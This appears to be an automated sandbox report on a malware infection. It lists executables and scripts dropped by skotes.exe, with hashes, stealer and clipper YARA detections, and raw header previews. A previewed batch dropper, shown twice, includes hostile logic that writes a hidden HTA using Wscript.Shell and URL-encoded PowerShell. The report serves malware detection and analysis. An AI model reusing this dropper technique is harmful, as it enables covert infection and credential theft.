C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	198656
Entropy (8bit):	6.697863110745783
Encrypted:	false
SSDEEP:	3072:2/qTyWF9mcSZfU0V+G0g0XhtmeaIEBkMBqjCF25O58a3E252X25sqw5EwiVqs2L:2iTyWF8Xh+G0g0Lm9suZ8a9w5EwiVqs
MD5:	F85B1133CD60523B8F31E916AFBEA386
SHA1:	DA6B1A5AB89598005A93DAC9B30C543C16F85864
SHA-256:	5D634CB2DD5F02597BA83411554518258AB8ED602CA7263D4F636FA639AB905D
SHA-512:	2E3EDBA0C3941749BC222BBBB2AC5097BCC54EC949B266DE430A1919B9987F51C6EDEFABAB647B5D92ED065DEB0B93487B459532AAA2F5C8A1F5794C5142DD5A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%\|g..............0.............>.... ... ....@.. .......................`............@.....................................O.... ..&....................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...&.... ......................@..@.reloc.......@......................@..B................ .......H........O..........\...................................................gZ$.....................t.................................................h.`LKA.DBEMBSG.QSFFE@.RO.B?F.KF.pea.GEPO.............h.....Y...Y...Y._.Z$..Y._.Z...Y._.Z%..Y._.Z...Y...Y...Y...Y...Y.\.Z/..Y.\.Z ..Y.\.Z%..Y...Y...Y^\.Z...Y^\.Z...YbKQL...Y........do..h.....8M............................B.......................................d............t.........................$+..\....+..d...................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	93696
Entropy (8bit):	6.742531881551865
Encrypted:	false
SSDEEP:	1536:f7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfNwFOq:T7DhdC6kzWypvaQ0FxyNTBfNy
MD5:	4D140076DE73C646ABAC6DF1FE85851C
SHA1:	2B6FA9656B2C22029324BC0ECBAA8444DB367990
SHA-256:	DDD080004434344384ACBA65B2135F3629E62E7A937CBDABBF7A4F9627EF4BBC
SHA-512:	704D2DC8A2F039CD1D4EF25C5F3F503DAAA03B56ADDB72762B195E6DBF630FF5838C71D82A100C89D2AE63C79FF855D32734F3866F16F787A7C1B221F95127B8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....V...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...b....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......L..............@....rsrc................^..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tbd0KQd[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	366592
Entropy (8bit):	7.931821235529767
Encrypted:	false
SSDEEP:	6144:nRF44VHPF10mDDHs33kXIFNzXUOH0wL5rgYKCCru7+n8JDCDFwy:n744Bd1lDDU3kQbFnxjVQwDwwy
MD5:	5AEAA47646D6304A2E37E1D61F2B180A
SHA1:	CD83EE8C98F901C31AD9B8304177DB93E1A1C37B
SHA-256:	B0C6D7A83188BB3879D513555E4C4BD3895E70FCC8E5E8A00CF4B2204894EDC2
SHA-512:	15C3FC62406478A9FF2962AB30B6093A1A40726B211CD4FDB76936D2E2E398A3AB8EBAF5CC7649AF62182C310AF14D8DF254C9BEC907215B34EB0ACD539D2972
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tbd0KQd[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5................0.................. ........@.. ....................... ......P.....`.................................`...K.......B............................................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.bss................................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VDoTjfk[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	360448
Entropy (8bit):	7.929390691624792
Encrypted:	false
SSDEEP:	6144:h88f5FvrlHEM9Ysfbaw1fNiN9RHd9wbsbb6TijRGEwLnJwi+Y/ABKiosHp1kl8n/:hPLSnwY9bY8OWFGE6JwK/sesLLA5+
MD5:	4ECED951FE56A908BE8EB3BC95B6A8ED
SHA1:	0B1C1EC501C64F7C1995BDD02AF4BBA6EE6D82B9
SHA-256:	E768C4EBEC903FDF1EB8A9213E9F405755CF69C3901C4B17F3E980296FDB04FA
SHA-512:	603559D7F5342E5E0C2DA222F074DE6B1D8679AA43BEB19F0BBDCA5F7EDC3137B7D0C0DF815720A1B0A2F89DF1C633E1CC4428715CBB5EAEA648BF25EE35CCE8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VDoTjfk[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5................0.................. ........@.. ...............................@....`.................................`...K.......B............................................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.bss................................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	500224
Entropy (8bit):	6.9993751003868185
Encrypted:	false
SSDEEP:	12288:R3fscf4y94gU6rfENQ9zAsfwlpbjLkV/qXzyi1MR:R30g4y94mr8izAsybPkV6
MD5:	9BF8B21D5ABECC43F525F3A2C8C1E20B
SHA1:	5779681435EE1BCB22C610656E00A06FBF2D353F
SHA-256:	22000D5648CBAADD7B84456DD52F9F57ECB972AC39CB47AAD330E4DE6390B7DA
SHA-512:	5E7AFDC93D2A66A4C8FC671AB3922D18163EE2690EE5828D5C8BA9801E48DF9D1DC32B3BF929BCA57F6A79294DB790FEF8957E2BB43CE5D91E3D678AF3152E74
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{g..............0.............N.... ........@.. ....................................@.....................................W.......6............................................................................ ............... ..H............text...T.... ...................... ..`.rsrc...6...........................@..@.reloc..............................@..B................0.......H...........$.......\...................................................gZ$.....................t.................................................h.`LKA.DBEMBSG.QSFFE@.RO.B?F.KF.pea.GEPO.............h.....Y...Y...Y._.Z$..Y._.Z...Y._.Z%..Y._.Z...Y...Y...Y...Y...Y.\.Z/..Y.\.Z ..Y.\.Z%..Y...Y...Y^\.Z...Y^\.Z...YbKQL...Y........do..h.....9M....................$.......;.......t...........................................t.........................$...8.......d...................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\rsn[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53005610
Entropy (8bit):	7.95405447440086
Encrypted:	false
SSDEEP:	1572864:UVTg/44gYxzPIxeDlEcZeVMa8U6BhxmfdPYLswtC0u:UJmgYxzPI0xEMgvWxcdPYDS
MD5:	8459D2471FC751878498826168489601
SHA1:	1B2F1760F58B5057635394FB48653FB4B3E25F94
SHA-256:	3CF2F05742EC341A5FF73D067402B66BB7E842CAC0BBEFA0B6C47036429BEF59
SHA-512:	C116AFC444F0791A4A064F6BE56EAB2BE35763C029BD7058BBCED1C98D0008E641D46F9B6F482438CD3D85124E19A1CA2ADBC8527FE386242CC2B2CFEE0B10B1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."...........+......\|............@...................................)...@.....................................d.......<...................-........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...<......,*.................@..@.reloc........-.......,.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\D95Ju8g[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1453568
Entropy (8bit):	7.8526825114803005
Encrypted:	false
SSDEEP:	24576:ta85i5KOYJN5R0jf9uRXhsdeL16XRvYDZSD+mRjrIIbofn/Pg9WjO+:Di5IR0f9uGQLYhvAovjrIIQAsh
MD5:	42E93CEDC1BE408F525D5A245527035C
SHA1:	15760ECB3183A058D26C504C4441968EF498001B
SHA-256:	6F70B86B072DEF13AEE42BDABD0DF4F7CC3A2E04EE4A0DFF0C3CEE35CC985D94
SHA-512:	0CBA98CA365811F384BC189A0D56E5DDF8793EA7C77171945D72A0053C2A4345A1F8D6507BF03934F6ED2ACA5D172FFC1DE309E00A953B7547B5C9155229BC4D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.fg.................$...........B... ...`....@.. ....................................`..................................B..K....`............................................................................... ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................B......H.......01...Z............................................................(......(.......(.....0.......... ........8........E............q...H...8....~....r...p.....(....o....s......... ....~....{....:....& ....8....~....9.... ....~....{....9....& ....8z...8.... ....~....{....9a...& ....8V....~............j(....r?..p~....o....t.....&~..........~......0..d....... ........8........E....D.......8?........(.....rO..p(....(...+o....& ....~....{....9....& ....8....*&~..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Dd7mHw1[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9578331
Entropy (8bit):	7.579199063799339
Encrypted:	false
SSDEEP:	196608:UxB14xuTMS+BPC2cZ07LqyUl7m6/ZTYtSx0USapM7KxBx:YL4QTz+YZ0/qXjpYteX
MD5:	8EA30ACC005292F38B5B3886F244B2A9
SHA1:	FEAAEEF18B6D2A5A2B974B5A32D970E8D9356321
SHA-256:	77D5C3A637603FEF747234B246F206CB3AC8200BC018A4D78D437FE80B0D071F
SHA-512:	77910C47AC6C57982DB81DA036A0C78CA43792EDB7F91D2E07903AB4A833C528F9C13100745D801C06B5649672E00BFDA5475BC25C17FB2D7EEAC0DE9981697F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 22%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[F.$.'`w.'`w.'`w..w.'`w..w.'`w.ydv.'`w..w.'`w..w.'`w..w_'`w.P.w.'`w.'aw.&`w.P.w.'`w..w2'`w..w.'`w.'.w.'`w..w.'`wRich.'`w................PE..L...P.,a.............................6............@.......................................@.................................\F..........t....................`...j..@...8...............................@....................B.......................text............................... ..`.rdata..T...........................@..@.data...XI...p...$...L..............@....rsrc...t............p..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1038693
Entropy (8bit):	7.892980238860217
Encrypted:	false
SSDEEP:	24576:YLA96z4S/zCtTFL/qcF8UReLbpPEwpA0jg8Zg:mA6/EFO+8selrpm
MD5:	89841D2045725C18C80011B9CE901B4E
SHA1:	CB27F6A88454817FB675D1288C0AC455BE1AC42B
SHA-256:	E064EEAB25A47FD1D9B0BF40C8A82254E5F3A5EBB332129F6B91F7E7B6D60A91
SHA-512:	255AA3D8F3AEE82D92B0669D0438A4612FEB48295032C1D97E5FE7A251EDC857C726A4A98ADDF9A69A40192D39DDD335B4F9EB1C6094CF63F456E3E8C512F10C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Reputation:	unknown
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d......L..........#..........8......d..........@.............................0......7................................................................p.......P..........`Z...........................................................................................text............................... ..`.rdata..lR.......T..................@..@.data..../... ......................@....pdata.......P......................@..@.rsrc........p.......*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\am_no[1].bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	DOS batch file, Unicode text, UTF-8 (with BOM) text, with very long lines (798), with CRLF line terminators
Category:	dropped
Size (bytes):	2806
Entropy (8bit):	5.060793840503647
Encrypted:	false
SSDEEP:	48:EouU8rgHHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQa0:/u+GurX16HA3Ux6D9Dw1fQGObEQa0
MD5:	1215CF1661A84CA4EC7712BB45B9FC02
SHA1:	4A791B523301C9120665AD89B1F54E5E8FADBF58
SHA-256:	9CCCCEE1E266F3C91138B7125AB0BB6A0C8C86AFD6EAEDA045D4E6DC76F33859
SHA-512:	F019FDD9DDAA25E12A04AD62381CEDB7D38FF26FE52E2F0E2205B9E5239B82466A488E3D5CCE3D73471367821121C68D55C106F64E251578D852F45E9270AFA6
Malicious:	false
Reputation:	unknown
Preview:	.@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. timeout /t 2 >nul.. if not exist "%filePath%" exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439296
Entropy (8bit):	6.489951590243045
Encrypted:	false
SSDEEP:	12288:24RGSlxPlNjb1kaVKfpy4FjMSkhCzL7ARDWb:5lNbKTZMzO4RDY
MD5:	CD0C9B8F92C8BE5F0044145E99E98D43
SHA1:	698637B2A7FD4740A6B96A736B82FFFB0CE67819
SHA-256:	68F60B3ECF60546520E15E442401384703B5436F6F7224BCC6F92B4CA24BABA6
SHA-512:	033B7FFF79F9AF35E92781AAADA06A55619EDDCF7D4BC40FD7EE027627E6AE770F96F2A11148392E64EF2495F30A90DD2486115EF1A7FB1408678FD14E17E5C2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L....Uhg............................'.............@..........................0............@..................................E...................................E......8...............................@...............<............................text...j........................... ..`.rdata...H.......J..................@..@.data....m...`...,...@..............@....rsrc................l..............@..@.reloc...E.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mQvinTe[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1038693
Entropy (8bit):	7.892980238860217
Encrypted:	false
SSDEEP:	24576:YLA96z4S/zCtTFL/qcF8UReLbpPEwpA0jg8Zg:mA6/EFO+8selrpm
MD5:	89841D2045725C18C80011B9CE901B4E
SHA1:	CB27F6A88454817FB675D1288C0AC455BE1AC42B
SHA-256:	E064EEAB25A47FD1D9B0BF40C8A82254E5F3A5EBB332129F6B91F7E7B6D60A91
SHA-512:	255AA3D8F3AEE82D92B0669D0438A4612FEB48295032C1D97E5FE7A251EDC857C726A4A98ADDF9A69A40192D39DDD335B4F9EB1C6094CF63F456E3E8C512F10C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 11%
Reputation:	unknown
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d......L..........#..........8......d..........@.............................0......7................................................................p.......P..........`Z...........................................................................................text............................... ..`.rdata..lR.......T..................@..@.data..../... ......................@....pdata.......P......................@..@.rsrc........p.......*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11608
Entropy (8bit):	4.890472898059848
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5:	8A4B02D8A977CB929C05D4BC2942C5A9
SHA1:	F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256:	624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512:	38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	93696
Entropy (8bit):	6.742531881551865
Encrypted:	false
SSDEEP:	1536:f7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfNwFOq:T7DhdC6kzWypvaQ0FxyNTBfNy
MD5:	4D140076DE73C646ABAC6DF1FE85851C
SHA1:	2B6FA9656B2C22029324BC0ECBAA8444DB367990
SHA-256:	DDD080004434344384ACBA65B2135F3629E62E7A937CBDABBF7A4F9627EF4BBC
SHA-512:	704D2DC8A2F039CD1D4EF25C5F3F503DAAA03B56ADDB72762B195E6DBF630FF5838C71D82A100C89D2AE63C79FF855D32734F3866F16F787A7C1B221F95127B8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....V...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...b....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......L..............@....rsrc................^..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	DOS batch file, Unicode text, UTF-8 (with BOM) text, with very long lines (798), with CRLF line terminators
Category:	dropped
Size (bytes):	2806
Entropy (8bit):	5.060793840503647
Encrypted:	false
SSDEEP:	48:EouU8rgHHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQa0:/u+GurX16HA3Ux6D9Dw1fQGObEQa0
MD5:	1215CF1661A84CA4EC7712BB45B9FC02
SHA1:	4A791B523301C9120665AD89B1F54E5E8FADBF58
SHA-256:	9CCCCEE1E266F3C91138B7125AB0BB6A0C8C86AFD6EAEDA045D4E6DC76F33859
SHA-512:	F019FDD9DDAA25E12A04AD62381CEDB7D38FF26FE52E2F0E2205B9E5239B82466A488E3D5CCE3D73471367821121C68D55C106F64E251578D852F45E9270AFA6
Malicious:	false
Reputation:	unknown
Preview:	.@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. timeout /t 2 >nul.. if not exist "%filePath%" exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%

C:\Users\user\AppData\Local\Temp\1032619001\rsn.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53005610
Entropy (8bit):	7.95405447440086
Encrypted:	false
SSDEEP:	1572864:UVTg/44gYxzPIxeDlEcZeVMa8U6BhxmfdPYLswtC0u:UJmgYxzPI0xEMgvWxcdPYDS
MD5:	8459D2471FC751878498826168489601
SHA1:	1B2F1760F58B5057635394FB48653FB4B3E25F94
SHA-256:	3CF2F05742EC341A5FF73D067402B66BB7E842CAC0BBEFA0B6C47036429BEF59
SHA-512:	C116AFC444F0791A4A064F6BE56EAB2BE35763C029BD7058BBCED1C98D0008E641D46F9B6F482438CD3D85124E19A1CA2ADBC8527FE386242CC2B2CFEE0B10B1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."...........+......\|............@...................................)...@.....................................d.......<...................-........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...<......,*.................@..@.reloc........-.......,.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1032622001\Dd7mHw1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9578331
Entropy (8bit):	7.579199063799339
Encrypted:	false
SSDEEP:	196608:UxB14xuTMS+BPC2cZ07LqyUl7m6/ZTYtSx0USapM7KxBx:YL4QTz+YZ0/qXjpYteX
MD5:	8EA30ACC005292F38B5B3886F244B2A9
SHA1:	FEAAEEF18B6D2A5A2B974B5A32D970E8D9356321
SHA-256:	77D5C3A637603FEF747234B246F206CB3AC8200BC018A4D78D437FE80B0D071F
SHA-512:	77910C47AC6C57982DB81DA036A0C78CA43792EDB7F91D2E07903AB4A833C528F9C13100745D801C06B5649672E00BFDA5475BC25C17FB2D7EEAC0DE9981697F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 22%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[F.$.'`w.'`w.'`w..w.'`w..w.'`w.ydv.'`w..w.'`w..w.'`w..w_'`w.P.w.'`w.'aw.&`w.P.w.'`w..w2'`w..w.'`w.'.w.'`w..w.'`wRich.'`w................PE..L...P.,a.............................6............@.......................................@.................................\F..........t....................`...j..@...8...............................@....................B.......................text............................... ..`.rdata..T...........................@..@.data...XI...p...$...L..............@....rsrc...t............p..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1032624001\tbd0KQd.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	366592
Entropy (8bit):	7.931821235529767
Encrypted:	false
SSDEEP:	6144:nRF44VHPF10mDDHs33kXIFNzXUOH0wL5rgYKCCru7+n8JDCDFwy:n744Bd1lDDU3kQbFnxjVQwDwwy
MD5:	5AEAA47646D6304A2E37E1D61F2B180A
SHA1:	CD83EE8C98F901C31AD9B8304177DB93E1A1C37B
SHA-256:	B0C6D7A83188BB3879D513555E4C4BD3895E70FCC8E5E8A00CF4B2204894EDC2
SHA-512:	15C3FC62406478A9FF2962AB30B6093A1A40726B211CD4FDB76936D2E2E398A3AB8EBAF5CC7649AF62182C310AF14D8DF254C9BEC907215B34EB0ACD539D2972
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1032624001\tbd0KQd.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
